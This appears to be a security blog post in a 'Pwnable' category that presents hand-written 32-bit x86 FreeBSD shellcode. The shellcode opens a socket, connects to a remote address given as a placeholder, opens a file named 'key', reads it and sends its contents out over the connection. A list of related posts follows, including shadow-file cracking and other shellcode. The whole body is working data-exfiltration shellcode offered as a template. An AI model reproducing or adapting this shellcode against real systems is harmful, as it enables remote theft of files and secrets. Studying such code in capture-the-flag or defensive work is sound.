.globl main main: push %ebp mov %esp, %ebp sub $0x20, %esp xor %eax, %eax xor %ebx, %ebx xor %ecx, %ecx xor %edx, %edx push %ecx inc %ecx push %ecx inc %ecx push %ecx mov $0x61, %al push %eax int $0x80 mov %eax, %esi # socketaddr_in push $0xGHEFCDAB # IP LittleEndian pushw $0x3412 # port l.e pushw $0x02AA mov %esp, %ebx # connect mov $0x10, %cl push %ecx push %ebx push %eax mov $0x62, %al push %eax int $0x80 xor %eax, %eax xor %ebx, %ebx xor %ecx, %ecx xor %edx, %edx # open mov $0x05, %al #why ?? 3byte, but pushw push esp 2bytes. pushw $0x79 pushw $0x656B mov %esp, %ebx push %ecx push %ebx push %eax int $0x80 # read push $0x20 lea 0xffffffe0(%ebp), %ecx push %ecx push %eax xor %eax, %eax mov $0x03, %al push %eax int $0x80 # write mov %eax, %edx xor %eax, %eax mov $0x4, %al mov %esi, %ebx push %edx push %ecx push %ebx push %eax int $0x80 # exit leave ret
'Research > Pwnable' 카테고리의 다른 글
| SHA 512, /etc/shadow decrypt (0) | 2014.01.12 |
|---|---|
| FreeBSD 에서 proc 디렉토리에 PID 가 없을때 (0) | 2013.11.07 |
| [shellcode] FreeBSD x86 Socket/Connect (0) | 2013.08.06 |
| FreeBSD Syscall numbers (0) | 2013.08.06 |
| [shellcode] Linux x86 open, read, write (0) | 2013.08.02 |